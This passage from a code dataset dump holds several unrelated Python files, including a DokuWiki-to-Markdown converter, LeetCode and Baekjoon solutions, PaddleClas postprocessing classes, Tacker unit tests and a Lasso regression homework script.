tQ list.')\n bible_list = self.process_api_request(bible_api_url)\n quiet_print(self.quiet, 'Finished downloading Bible tQ list.')\n\n quiet_print(self.quiet, 'Downloading OBS tQ list.')\n obs_list = self.process_api_request(obs_api_url)\n quiet_print(self.quiet, 'Finished downloading OBS tQ list.')\n\n target_dir = os.path.join(self.bible_out_dir, 'content')\n for url in bible_list:\n self.download_bible_file(url, target_dir)\n\n manifest = ResourceManifest('tq', 'translationQuestions')\n manifest.status['checking_level'] = '3'\n manifest.status['version'] = '3'\n manifest.status['checking_entity'] = 'Wycliffe Associates'\n\n manifest.language['slug'] = lang_code\n manifest.language['name'] = self.lang_data['ang']\n manifest.language['dir'] = self.lang_data['ld']\n\n manifest_str = json.dumps(manifest, sort_keys=False, indent=2, cls=ResourceManifestEncoder)\n write_file(os.path.join(self.bible_out_dir, 'manifest.json'), manifest_str)\n\n target_dir = os.path.join(self.obs_out_dir, 'content')\n for url in obs_list:\n self.download_obs_file(url, target_dir)\n\n manifest = ResourceManifest('obs-tq', 'OBS translationQuestions')\n manifest.status['checking_level'] = '3'\n manifest.status['version'] = '3'\n manifest.status['checking_entity'] = 'Wycliffe Associates'\n\n manifest.language['slug'] = lang_code\n manifest.language['name'] = self.lang_data['ang']\n manifest.language['dir'] = self.lang_data['ld']\n\n manifest_str = json.dumps(manifest, sort_keys=False, indent=2, cls=ResourceManifestEncoder)\n write_file(os.path.join(self.obs_out_dir, 'manifest.json'), manifest_str)\n\n def process_api_request(self, url):\n\n quiet_print(self.quiet, ' Getting {0}.'.format(url))\n\n if '?' 
in url:\n url += '&access_token={0}'.format(self.access_token)\n else:\n url += '?access_token={0}'.format(self.access_token)\n\n # get the directory listing\n items = json.loads(get_url(url))\n\n # collect the files\n file_list = [o['download_url'] for o in items if o['type'] == 'file'\n and o['name'] != 'home.txt'\n and o['name'] != 'sidebar.txt']\n\n # check for sub-directories\n dir_list = [o['url'] for o in items if o['type'] == 'dir']\n\n for sub_dir in dir_list:\n file_list.extend(self.process_api_request(sub_dir))\n\n return file_list\n\n def download_bible_file(self, url_to_download, out_dir):\n\n parts = url_to_download.rsplit('/', 2)\n file_name = parts[2]\n dir_name = parts[1]\n save_as = os.path.join(out_dir, dir_name, file_name.replace('.txt', '.md'))\n if os.path.isfile(save_as):\n quiet_print(self.quiet, 'Skipping {0}.'.format(file_name))\n return\n\n quiet_print(self.quiet, 'Downloading {0}...'.format(url_to_download), end=' ')\n dw_text = get_url(url_to_download)\n\n md_text = dokuwiki_to_markdown(dw_text)\n\n # fix links to chapter list\n # **[[:en:bible:questions:comprehension:1ch:home|Back to 1 Chronicles Chapter List]]**\n md_text = self.chapter_link_re.sub(r'[\\2](./)', md_text)\n\n # remove tags\n md_text = self.tag_re.sub(r'', md_text)\n\n # remove squiggly tags\n md_text = self.squiggly_re.sub(r'', md_text)\n\n # remove extra blank lines\n md_text = self.extra_blanks_re.sub(r'\\n\\n', md_text)\n\n write_file(save_as, md_text)\n quiet_print(self.quiet, 'finished.')\n\n def download_obs_file(self, url_to_download, out_dir):\n\n parts = url_to_download.rsplit('/', 1)\n file_name = parts[1]\n save_as = os.path.join(out_dir, file_name.replace('.txt', '.md'))\n if os.path.isfile(save_as):\n quiet_print(self.quiet, 'Skipping {0}.'.format(file_name))\n return\n\n quiet_print(self.quiet, 'Downloading {0}...'.format(url_to_download), end=' ')\n dw_text = get_url(url_to_download)\n\n md_text = dokuwiki_to_markdown(dw_text)\n\n # fix links to chapter list\n # **[[:en:bible:questions:comprehension:1ch:home|Back to 1 Chronicles Chapter List]]**\n md_text = self.chapter_link_re.sub(r'[\\2](./)', md_text)\n\n # remove tags\n md_text = self.tag_re.sub(r'', md_text)\n\n # remove squiggly tags\n md_text = self.squiggly_re.sub(r'', md_text)\n\n # remove extra blank lines\n md_text = self.extra_blanks_re.sub(r'\\n\\n', md_text)\n\n # insert missing blank line\n md_text = self.missing_blank_line_re.sub(r'\\1\\n\\2', md_text)\n\n # fix story number\n md_text = self.story_num_re.sub(r'\\1', md_text)\n\n # navigation\n md_text = self.navigate_re.sub(r'[\\2](./\\1.md)', md_text)\n md_text = self.navigate2_re.sub(r'[\\2](./\\1.md)', md_text)\n\n write_file(save_as, md_text)\n quiet_print(self.quiet, 'finished.')\n","repo_name":"unfoldingWord-dev/dokuwiki-to-rc","sub_path":"converters/tq_converter.py","file_name":"tq_converter.py","file_ext":"py","file_size_in_byte":8425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7667318497","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n dic,length,start = {},0,0\n for i,j in enumerate(s):\n if j in dic:\n sums = dic[j] + 1\n if sums > start:\n start = sums\n num = i - start + 1\n if num > length:\n length = num\n dic[j] = i\n return length\n# Runtime: 60 ms, faster than 76.33% of Python3 online submissions for Longest Substring Without Repeating Characters.\n# Memory Usage: 13.9 MB, less than 55.58% of Python3 online submissions for Longest Substring Without 
Repeating Characters.\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n char = [0]*128\n left = right = res = 0\n while right < len(s):\n r = s[right]\n char[ord(r)] += 1\n \n while char[ord(r)] > 1:\n l = s[left]\n char[ord(l)] -= 1\n left += 1\n \n res = max(res,right-left+1)\n \n \n right += 1\n return res\n# Runtime: 131 ms, faster than 26.07% of Python3 online submissions for Longest Substring Without Repeating Characters.\n# Memory Usage: 14.3 MB, less than 54.91% of Python3 online submissions for Longest Substring Without Repeating Characters.\n\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n n = len(s)\n ans = 0\n mp = {}\n i = 0\n for j in range(n):\n if s[j] in mp:\n i = max(mp[s[j]],i)\n \n ans = max(ans,j-i+1)\n mp[s[j]] = j +1\n return ans\n# Runtime: 94 ms, faster than 53.46% of Python3 online submissions for Longest Substring Without Repeating Characters.\n# Memory Usage: 14 MB, less than 97.46% of Python3 online submissions for Longest Substring Without Repeating Characters.\n","repo_name":"Kuehar/LeetCode","sub_path":"Longest Substring Without Repeating Characters.py","file_name":"Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"21827475800","text":"\nclass Memory:\n def __init__(self):\n self.mem = {}\n\n def update_mem(self, user, data):\n if user in self.mem:\n self.mem[user] = self.mem[user].update(data)\n else:\n self.mem[user] = User(user)\n\n def reset(self):\n self.mem = {}\n\n\nclass User:\n\n def __init__(self, name):\n self.name = name\n self.chatbot_interest = False\n self.fav_chatbot = ''\n self.snide = False\n self.chatbot_dislike = False\n\n def update(self, data):\n words = ['chatbot', 'chatbots', 'bot', 'bots']\n words_in_msg = any(x in data for x in words)\n\n if \"don't like\" in data and words_in_msg:\n self.chatbot_dislike = True\n elif 'like' in data and words_in_msg:\n self.chatbot_interest = True\n elif 'favorite' in data and words_in_msg:\n self.fav_chatbot = data.strip().split()[-1]\n elif words_in_msg:\n self.snide = True\n \n\n return self","repo_name":"slin35/personality-driven-bot","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23445131425","text":"import os\nimport copy\nimport shutil\nfrom functools import partial\nimport importlib\nimport numpy as np\nimport paddle\nimport paddle.nn.functional as F\n\n\ndef build_postprocess(config):\n if config is None:\n return None\n\n mod = importlib.import_module(__name__)\n config = copy.deepcopy(config)\n\n main_indicator = config.pop(\n \"main_indicator\") if \"main_indicator\" in config else None\n main_indicator = main_indicator if main_indicator else \"\"\n\n func_list = []\n for func in config:\n func_list.append(getattr(mod, func)(**config[func]))\n return PostProcesser(func_list, main_indicator)\n\n\nclass PostProcesser(object):\n def __init__(self, func_list, main_indicator=\"Topk\"):\n self.func_list = func_list\n self.main_indicator = main_indicator\n\n def __call__(self, x, image_file=None):\n rtn = None\n for func in self.func_list:\n tmp = func(x, image_file)\n if type(func).__name__ in self.main_indicator:\n rtn = tmp\n return rtn\n\n\nclass ThreshOutput(object):\n def __init__(self, threshold, label_0=\"0\", label_1=\"1\"):\n self.threshold 
= threshold\n self.label_0 = label_0\n self.label_1 = label_1\n\n def __call__(self, x, file_names=None):\n y = []\n for idx, probs in enumerate(x):\n score = probs[1]\n if score < self.threshold:\n result = {\n \"class_ids\": [0],\n \"scores\": [1 - score],\n \"label_names\": [self.label_0]\n }\n else:\n result = {\n \"class_ids\": [1],\n \"scores\": [score],\n \"label_names\": [self.label_1]\n }\n if file_names is not None:\n result[\"file_name\"] = file_names[idx]\n y.append(result)\n return y\n\n\nclass Topk(object):\n def __init__(self, topk=1, class_id_map_file=None):\n assert isinstance(topk, (int, ))\n self.class_id_map = self.parse_class_id_map(class_id_map_file)\n self.topk = topk\n\n def parse_class_id_map(self, class_id_map_file):\n if class_id_map_file is None:\n return None\n\n if not os.path.exists(class_id_map_file):\n print(\n \"Warning: If want to use your own label_dict, please input legal path!\\nOtherwise label_names will be empty!\"\n )\n return None\n\n try:\n class_id_map = {}\n with open(class_id_map_file, \"r\") as fin:\n lines = fin.readlines()\n for line in lines:\n partition = line.split(\"\\n\")[0].partition(\" \")\n class_id_map[int(partition[0])] = str(partition[-1])\n except Exception as ex:\n print(ex)\n class_id_map = None\n return class_id_map\n\n def __call__(self, x, file_names=None, multilabel=False):\n if file_names is not None:\n assert x.shape[0] == len(file_names)\n y = []\n for idx, probs in enumerate(x):\n index = probs.argsort(axis=0)[-self.topk:][::-1].astype(\n \"int32\") if not multilabel else np.where(\n probs >= 0.5)[0].astype(\"int32\")\n clas_id_list = []\n score_list = []\n label_name_list = []\n for i in index:\n clas_id_list.append(i.item())\n score_list.append(probs[i].item())\n if self.class_id_map is not None:\n label_name_list.append(self.class_id_map[i.item()])\n result = {\n \"class_ids\": clas_id_list,\n \"scores\": np.around(\n score_list, decimals=5).tolist(),\n }\n if file_names is not None:\n result[\"file_name\"] = file_names[idx]\n if label_name_list is not None:\n result[\"label_names\"] = label_name_list\n y.append(result)\n return y\n\n\nclass MultiLabelTopk(Topk):\n def __init__(self, topk=1, class_id_map_file=None):\n super().__init__()\n\n def __call__(self, x, file_names=None):\n return super().__call__(x, file_names, multilabel=True)\n\n\nclass SavePreLabel(object):\n def __init__(self, save_dir):\n if save_dir is None:\n raise Exception(\n \"Please specify save_dir if SavePreLabel specified.\")\n self.save_dir = partial(os.path.join, save_dir)\n\n def __call__(self, x, file_names=None):\n if file_names is None:\n return\n assert x.shape[0] == len(file_names)\n for idx, probs in enumerate(x):\n index = probs.argsort(axis=0)[-1].astype(\"int32\")\n self.save(index, file_names[idx])\n\n def save(self, id, image_file):\n output_dir = self.save_dir(str(id))\n os.makedirs(output_dir, exist_ok=True)\n shutil.copy(image_file, output_dir)\n\n\nclass Binarize(object):\n def __init__(self, method=\"round\"):\n self.method = method\n self.unit = np.array([[128, 64, 32, 16, 8, 4, 2, 1]]).T\n\n def __call__(self, x, file_names=None):\n if self.method == \"round\":\n x = np.round(x + 1).astype(\"uint8\") - 1\n\n if self.method == \"sign\":\n x = ((np.sign(x) + 1) / 2).astype(\"uint8\")\n\n embedding_size = x.shape[1]\n assert embedding_size % 8 == 0, \"The Binary index only support vectors with sizes multiple of 8\"\n\n byte = np.zeros([x.shape[0], embedding_size // 8], dtype=np.uint8)\n for i in range(embedding_size // 8):\n 
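# pack every group of 8 binary components into a single uint8 via a dot product with the column vector [128, 64, ..., 1]\n            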
byte[:, i:i + 1] = np.dot(x[:, i * 8:(i + 1) * 8], self.unit)\n\n return byte\n\n\nclass PersonAttribute(object):\n def __init__(self,\n threshold=0.5,\n glasses_threshold=0.3,\n hold_threshold=0.6):\n self.threshold = threshold\n self.glasses_threshold = glasses_threshold\n self.hold_threshold = hold_threshold\n\n def __call__(self, batch_preds, file_names=None):\n # postprocess output of predictor\n age_list = ['AgeLess18', 'Age18-60', 'AgeOver60']\n direct_list = ['Front', 'Side', 'Back']\n bag_list = ['HandBag', 'ShoulderBag', 'Backpack']\n upper_list = ['UpperStride', 'UpperLogo', 'UpperPlaid', 'UpperSplice']\n lower_list = [\n 'LowerStripe', 'LowerPattern', 'LongCoat', 'Trousers', 'Shorts',\n 'Skirt&Dress'\n ]\n batch_res = []\n for res in batch_preds:\n res = res.tolist()\n label_res = []\n # gender \n gender = 'Female' if res[22] > self.threshold else 'Male'\n label_res.append(gender)\n # age\n age = age_list[np.argmax(res[19:22])]\n label_res.append(age)\n # direction \n direction = direct_list[np.argmax(res[23:])]\n label_res.append(direction)\n # glasses\n glasses = 'Glasses: '\n if res[1] > self.glasses_threshold:\n glasses += 'True'\n else:\n glasses += 'False'\n label_res.append(glasses)\n # hat\n hat = 'Hat: '\n if res[0] > self.threshold:\n hat += 'True'\n else:\n hat += 'False'\n label_res.append(hat)\n # hold obj\n hold_obj = 'HoldObjectsInFront: '\n if res[18] > self.hold_threshold:\n hold_obj += 'True'\n else:\n hold_obj += 'False'\n label_res.append(hold_obj)\n # bag\n bag = bag_list[np.argmax(res[15:18])]\n bag_score = res[15 + np.argmax(res[15:18])]\n bag_label = bag if bag_score > self.threshold else 'No bag'\n label_res.append(bag_label)\n # upper\n upper_res = res[4:8]\n upper_label = 'Upper:'\n sleeve = 'LongSleeve' if res[3] > res[2] else 'ShortSleeve'\n upper_label += ' {}'.format(sleeve)\n for i, r in enumerate(upper_res):\n if r > self.threshold:\n upper_label += ' {}'.format(upper_list[i])\n label_res.append(upper_label)\n # lower\n lower_res = res[8:14]\n lower_label = 'Lower: '\n has_lower = False\n for i, l in enumerate(lower_res):\n if l > self.threshold:\n lower_label += ' {}'.format(lower_list[i])\n has_lower = True\n if not has_lower:\n lower_label += ' {}'.format(lower_list[np.argmax(lower_res)])\n\n label_res.append(lower_label)\n # shoe\n shoe = 'Boots' if res[14] > self.threshold else 'No boots'\n label_res.append(shoe)\n\n threshold_list = [0.5] * len(res)\n threshold_list[1] = self.glasses_threshold\n threshold_list[18] = self.hold_threshold\n pred_res = (np.array(res) > np.array(threshold_list)\n ).astype(np.int8).tolist()\n batch_res.append({\"attributes\": label_res, \"output\": pred_res})\n return batch_res\n\n\nclass VehicleAttribute(object):\n def __init__(self, color_threshold=0.5, type_threshold=0.5):\n self.color_threshold = color_threshold\n self.type_threshold = type_threshold\n self.color_list = [\n \"yellow\", \"orange\", \"green\", \"gray\", \"red\", \"blue\", \"white\",\n \"golden\", \"brown\", \"black\"\n ]\n self.type_list = [\n \"sedan\", \"suv\", \"van\", \"hatchback\", \"mpv\", \"pickup\", \"bus\",\n \"truck\", \"estate\"\n ]\n\n def __call__(self, batch_preds, file_names=None):\n # postprocess output of predictor\n batch_res = []\n for res in batch_preds:\n res = res.tolist()\n label_res = []\n color_idx = np.argmax(res[:10])\n type_idx = np.argmax(res[10:])\n if res[color_idx] >= self.color_threshold:\n color_info = f\"Color: ({self.color_list[color_idx]}, prob: {res[color_idx]})\"\n else:\n color_info = \"Color 
unknown\"\n\n if res[type_idx + 10] >= self.type_threshold:\n type_info = f\"Type: ({self.type_list[type_idx]}, prob: {res[type_idx + 10]})\"\n else:\n type_info = \"Type unknown\"\n\n label_res = f\"{color_info}, {type_info}\"\n\n threshold_list = [self.color_threshold\n ] * 10 + [self.type_threshold] * 9\n pred_res = (np.array(res) > np.array(threshold_list)\n ).astype(np.int8).tolist()\n batch_res.append({\"attributes\": label_res, \"output\": pred_res})\n return batch_res\n","repo_name":"PaddlePaddle/PaddleClas","sub_path":"deploy/python/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":10773,"program_lang":"python","lang":"en","doc_type":"code","stars":5081,"dataset":"github-code","pt":"3"} +{"seq_id":"3618763583","text":"# 6월 21일\n\n# 1로 만들기\n# https://www.acmicpc.net/problem/1463\n# Dynamic Programming\n\n# 각 수를 만드는 최소의 경우의 수는 아래 점화식\n# d[n] = min(d[n / 3], d[n / 2], d[n - 1]) + 1\n# n/3에서 올 수 있거나, d/2에서 올 수 있거나, d - 1에서 올 수 있기 때문이다.\n# 2에서 n까지 순회하며 체크하면 가장 빠른 최소 횟수로 온 것이기 때문에 가능한 논리\n\n# bottom-up 방식으로 1에서부터 n까지 계산 결과를 통해 d[n]의 최소 회수를 구한다.\n\nn = int(input())\n\nd = [0] * (n + 1)\n\nfor i in range(2, n + 1):\n \n tmp = []\n\n if i % 3 == 0:\n tmp.append(d[i // 3])\n\n if i % 2 == 0:\n tmp.append(d[i // 2])\n \n tmp.append(d[i - 1])\n\n d[i] = min(tmp) + 1\n\nprint(d[n])\n","repo_name":"lee-gyu/happy_algorithm","sub_path":"20_06_June/lee_baekjun_1463.py","file_name":"lee_baekjun_1463.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72360516563","text":"from tacker.tests.unit import base\nfrom tacker.vnfm.infra_drivers.kubernetes.k8s import tosca_kube_object\n\n\nclass TestToscaKubeObject(base.TestCase):\n def setUp(self):\n super(TestToscaKubeObject, self).setUp()\n self.tosca_kube_object = tosca_kube_object.ToscaKubeObject(\n name='name',\n namespace='namespace',\n mapping_ports='mappingports',\n containers=[\n tosca_kube_object.Container(\n name=\"name\")],\n network_name=\"network\",\n mgmt_connection_point=True,\n scaling_object=[\n tosca_kube_object.ScalingObject(\n scale_target_name='scalingname')],\n service_type='servicetype',\n labels={\n 'lable': 'lable'},\n annotations=\"annotations\")\n\n def test_tosca_kube_object(self):\n self.assertEqual('name', self.tosca_kube_object.name)\n self.assertEqual('namespace', self.tosca_kube_object.namespace)\n\n\nclass TestContainerObject(base.TestCase):\n def setUp(self):\n super(TestContainerObject, self).setUp()\n self.container_object = tosca_kube_object.Container(\n name='container',\n num_cpus=1,\n mem_size=\"100MB\",\n image=\"ubuntu\",\n command='command',\n args=['args'],\n ports=['22'],\n config='config'\n )\n\n def test_container_object(self):\n self.assertEqual('container', self.container_object.name)\n self.assertEqual(1, self.container_object.num_cpus)\n self.assertEqual('100MB', self.container_object.mem_size)\n self.assertEqual('ubuntu', self.container_object.image)\n\n\nclass TestScalingObject(base.TestCase):\n def setUp(self):\n super(TestScalingObject, self).setUp()\n self.scaling_object = tosca_kube_object.ScalingObject(\n scaling_name='scalingname',\n min_replicas=1,\n max_replicas=3,\n scale_target_name=\"cp1\",\n target_cpu_utilization_percentage=\"40\"\n )\n\n def test_scaling_object(self):\n self.assertEqual('scalingname', self.scaling_object.scaling_name)\n self.assertEqual(1, self.scaling_object.min_replicas)\n self.assertEqual(3, self.scaling_object.max_replicas)\n 
self.assertEqual(\"cp1\", self.scaling_object.scale_target_name)\n self.assertEqual(\n \"40\", self.scaling_object.target_cpu_utilization_percentage)\n","repo_name":"openstack/tacker","sub_path":"tacker/tests/unit/vnfm/infra_drivers/kubernetes/test_tosca_kube_object.py","file_name":"test_tosca_kube_object.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"3"} +{"seq_id":"31321830711","text":"#Program Converts Feet to Inches. Performs program three times, then exits.\n#4 December 2017\n#CTI-110 M7T2_FeettoInches\n#Marie Hylton\n#\n\n#GLOBAL CONSTANT FOR THE NUMBER OF INCHES PER FOOT.\nINCHES_PER_FOOT=12\n\n#MAIN FUNCTION--WILL RUN THREE TIMES, THEN EXITS PROGRAM\ndef main():\n #GET A NUMBER OF FEET FROM THE USER:\n for x in range(1,4):\n feet=float(input(\"Enter the measurement in units of feet: \"))\n if feet>0:\n #CONVERT USER INPUT(FEET) INTO INCHES:\n print(feet, 'equals', format(feet_to_inches(feet),',.1f'), 'inches.')\n else:\n print(\"Enter a number greater than 0.\")\n print(\"Thank you for using the Feet to Inches Converter. Goodbye.\")\n\n#THE feet_to_inches FUNCTION CONVERTS FEET TO INCHES. \ndef feet_to_inches(feet):\n return feet*INCHES_PER_FOOT \n \nmain()\n","repo_name":"hyltonc4469/CTI-110","sub_path":"M7Tutorials_Hylton/M7T2FeettoInches_Hylton2.py","file_name":"M7T2FeettoInches_Hylton2.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31298645693","text":"from __future__ import division, absolute_import\n\nfrom incremental import Version\nfrom twisted.python.deprecate import deprecatedModuleAttribute\n\n\n# Known module-level attributes.\nDEPRECATED_ATTRIBUTE = 42\nANOTHER_ATTRIBUTE = 'hello'\n\n\nversion = Version('Twisted', 8, 0, 0)\nmessage = 'Oh noes!'\n\n\ndeprecatedModuleAttribute(\n version,\n message,\n __name__,\n 'DEPRECATED_ATTRIBUTE')\n","repo_name":"wistbean/learn_python3_spider","sub_path":"stackoverflow/venv/lib/python3.6/site-packages/twisted/python/test/deprecatedattributes.py","file_name":"deprecatedattributes.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":14022,"dataset":"github-code","pt":"3"} +{"seq_id":"34700546121","text":"from typing import Optional, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils import problem\n\n\n@problem.tag(\"hw2-A\")\ndef step(\n X: np.ndarray, y: np.ndarray, weight: np.ndarray, bias: float, _lambda: float, eta: float\n) -> Tuple[np.ndarray, float]:\n \"\"\"Single step in ISTA algorithm.\n It should update every entry in weight, and then return an updated version of weight along with \n calculated bias on input weight!\n\n Args:\n X (np.ndarray): An (n x d) matrix, with n observations each with d features.\n y (np.ndarray): An (n, ) array, with n observations of targets.\n weight (np.ndarray): An (d,) array. Weight returned from the step before.\n bias (float): Bias returned from the step before.\n _lambda (float): Regularization constant. Determines when weight is updated to 0, and when \n to other values.\n eta (float): Step-size. Determines how far the ISTA iteration moves for each step.\n\n Returns:\n Tuple[np.ndarray, float]: Tuple with 2 entries. 
First represents updated weight vector, \n second represents bias.\n \n \"\"\" \n v = (X @ weight - y + bias) \n b = bias - 2*eta*v.sum()\n w = weight - 2*eta*(X.T @ v) \n #print(\"####W####:\", w, \"####2*eta*_lambda####:\", 2*eta*_lambda)\n\n # soft thresholding\n w[np.abs(w) <= 2*eta*_lambda] = 0 # must come first!\n w[w < -2*eta*_lambda] += 2*eta*_lambda\n w[w > 2*eta*_lambda] -= 2*eta*_lambda \n return w, b\n\n@problem.tag(\"hw2-A\")\ndef loss(\n X: np.ndarray, y: np.ndarray, weight: np.ndarray, bias: float, _lambda: float\n) -> float:\n \"\"\"L-1 (Lasso) regularized MSE loss.\n\n Args:\n X (np.ndarray): An (n x d) matrix, with n observations each with d features.\n y (np.ndarray): An (n, ) array, with n observations of targets.\n weight (np.ndarray): An (d,) array. Currently predicted weights.\n bias (float): Currently predicted bias.\n _lambda (float): Regularization constant. Should be used along with L1 norm of weight.\n\n Returns:\n float: value of the loss function\n \"\"\" \n n, d = X.shape \n\n v = (X @ weight - y + bias) \n return (v @ v) + _lambda * np.linalg.norm(weight, ord=1)\n\n\n@problem.tag(\"hw2-A\", start_line=5)\ndef train(\n X: np.ndarray,\n y: np.ndarray,\n _lambda: float = 0.01,\n eta: float = 0.001,\n convergence_delta: float = 1e-4,\n start_weight: np.ndarray = None,\n start_bias: float = None\n) -> Tuple[np.ndarray, float]:\n \"\"\"Trains a model and returns predicted weight and bias.\n\n Args:\n X (np.ndarray): An (n x d) matrix, with n observations each with d features.\n y (np.ndarray): An (n, ) array, with n observations of targets.\n _lambda (float): Regularization constant. Should be used for both step and loss.\n eta (float): Step size.\n convergence_delta (float, optional): Defines when to stop training algorithm.\n The smaller the value the longer algorithm will train.\n Defaults to 1e-4.\n start_weight (np.ndarray, optional): Weight for hot-starting model.\n If None, defaults to array of zeros. Defaults to None.\n It can be useful when testing for multiple values of lambda.\n start_bias (np.ndarray, optional): Bias for hot-starting model.\n If None, defaults to zero. 
Defaults to None.\n It can be useful when testing for multiple values of lambda.\n\n Returns:\n Tuple[np.ndarray, float]: A tuple with first item being array of shape (d,) representing \n predicted weights, and second item being a float representing the bias.\n\n Note:\n - You will have to keep an old copy of weights for convergence criterion function.\n Please use `np.copy(...)` function, since numpy might sometimes copy by reference,\n instead of by value leading to bugs.\n - You might wonder why do we also return bias here, if we don't need it for this problem.\n There are two reasons for it:\n - Model is fully specified only with bias and weight.\n Otherwise you would not be able to make predictions.\n Training function that does not return a fully usable model is just weird.\n - You will use bias in next problem.\n \"\"\"\n if start_weight is None:\n start_weight = np.zeros(X.shape[1])\n start_bias = 0\n old_w: Optional[np.ndarray] = None\n old_b: Optional[np.ndarray] = None\n w = start_weight\n b = start_bias\n while old_w is None or not convergence_criterion(w, old_w, b, old_b, convergence_delta):\n old_w = np.copy(w)\n old_b = np.copy(b)\n w, b = step(X, y, w, b, _lambda, eta)\n max_delta = np.abs(np.hstack((w - old_w, b - old_b))).max()\n return w, b\n\n\n@problem.tag(\"hw2-A\")\ndef convergence_criterion(\n weight: np.ndarray, old_w: np.ndarray, bias: float, old_b: float, convergence_delta: float\n) -> bool:\n \"\"\"Function determining whether weight has converged or not.\n It should calculate the maximum absolute change between weight and old_w vector, and compare it \n to convergence delta.\n\n Args:\n weight (np.ndarray): Weight from current iteration of coordinate gradient descent.\n old_w (np.ndarray): Weight from previous iteration of coordinate gradient descent.\n convergence_delta (float): Aggressiveness of the check.\n\n Returns:\n bool: False, if weight has not converged yet. 
True otherwise.\n \"\"\" \n return np.abs(weight - old_w).max() <= convergence_delta\n\n\n@problem.tag(\"hw2-A\")\ndef main():\n \"\"\"\n Use all of the functions above to make plots.\n \"\"\"\n import numpy as np\n\n n = 500 # number of data points\n d = 1000 # dimension of the input features\n k = 100 # number of non-zero true weights/number of relevant features\n w_true = np.hstack((np.linspace(1/k, 1, num=k), np.zeros(d-k))) \n\n rng = np.random.default_rng()\n X = rng.normal(size=(n, d)) # no need for standardization\n e = rng.normal(size=n)\n y = X @ w_true + e\n\n _lambda = 2*np.abs(X.T @ (y - y.mean())).max()\n num_non_zero = 0\n lambdas, num_non_zeros = [], []\n fdr, tpr = [], []\n while num_non_zero < d:\n w, b = train(X, y, _lambda, eta=2e-5, convergence_delta=1e-4) \n num_non_zero = np.count_nonzero(w)\n lambdas.append(_lambda)\n num_non_zeros.append(num_non_zero)\n\n np.count_nonzero(w[0:k])\n if num_non_zero == 0:\n fdr.append(0)\n tpr.append(0)\n else:\n fdr.append(np.count_nonzero(w[k:d]) / num_non_zero)\n tpr.append(np.count_nonzero(w[0:k]) / k)\n _lambda *= 0.5\n\n plt.tight_layout()\n plt.plot(lambdas, num_non_zeros)\n plt.xscale(\"log\")\n plt.xlabel(\"$\\lambda$\")\n plt.ylabel(\"Number of non-zero weights\")\n plt.title(\"Lasso Regularization\")\n plt.show()\n\n plt.plot(fdr, tpr)\n plt.xlabel(\"FDR\")\n plt.ylabel(\"TPR\")\n plt.title(\"True Positive Rate vs False Discovery Rate\")\n plt.show()\n\ndef main_test():\n \"\"\"\n Use all of the functions above to make plots.\n \"\"\"\n import numpy as np\n\n n = 500 # number of data points\n d = 1000 # dimension of the input features\n k = 100 # number of non-zero true weights/number of relevant features\n sigma = 1\n _lambda = 200\n\n w_true = np.hstack((np.linspace(1/k, 1, num=k), np.zeros(d-k))) \n\n rng = np.random.default_rng(seed=42)\n \n \n\n # xpoints = np.linspace(np.max(X), np.min(X), 100).reshape(-1, 1)\n\n # fig, axs = plt.subplots(2, 3)\n # dis = (0, 1, 2, 3, 4, 5)\n # for ax, di in zip(axs.flat, dis):\n # ax.plot(X[:,di], y, 'or', label=f\"raw data[{di}]\")\n # ax.plot(X[:,di], y_opt, label=f\"de-noised data[{di}]\")\n # ax.plot(X[:,di], X[:,di]*w_true[di], label=f\"contribution to y\")\n # ax.legend()\n # ax.set_title(f\"w_true[{di}] = {w_true[di]:.2f}\")\n # ax.set(xlabel='X', ylabel='Y')\n # plt.show()\n\n # plt.plot(X[:,0], y, 'or', label=\"raw data[0]\")\n # plt.plot(X[:,0], y_opt, label=\"de-noised data[0]\")\n # plt.legend()\n # plt.show()\n # plt.plot(X[:,1], y, label=\"raw data[1]\")\n # plt.plot(X[:,1], y_opt, label=\"de-noised data[1]\")\n # plt.show()\n\n # X = rng.uniform(0, 10, size=(n, d))\n # mean = np.mean(X, axis=0, keepdims=True)\n # std = np.std(X, axis=0, keepdims=True)\n # std[std == 0] = 1 # avoid division by zero, just in case\n # X = (X - mean) / std\n\n X = rng.normal(size=(n, d))\n e = rng.normal(scale=sigma, size=n)\n y = X @ w_true + e\n y_opt = X @ w_true\n w, b = train(X, y, _lambda, eta=0.0001, convergence_delta=0.01)\n print(\"lol\") \n y_pred = X @ w + b \n\n \n fig, (ax1, ax2, ax3) = plt.subplots(1, 3)\n ax1.plot(y_opt, y_pred, '.b')\n ax1.plot((y_pred.min(), y_pred.max()), (y_pred.min(), y_pred.max()), '--r')\n ax1.set_title(\"predictions vs de-noised data\")\n ax2.plot(y, y_pred, '.b')\n ax2.plot((y_pred.min(), y_pred.max()), (y_pred.min(), y_pred.max()), '--r')\n ax2.set_title(\"predictions vs raw data\")\n ax3.plot(w_true, w, '.b', alpha=0.2)\n ax3.plot((w.min(), w.max()), (w.min(), w.max()), '--r')\n ax3.set_title(\"predicted w vs true w\")\n print(f\"minimum 
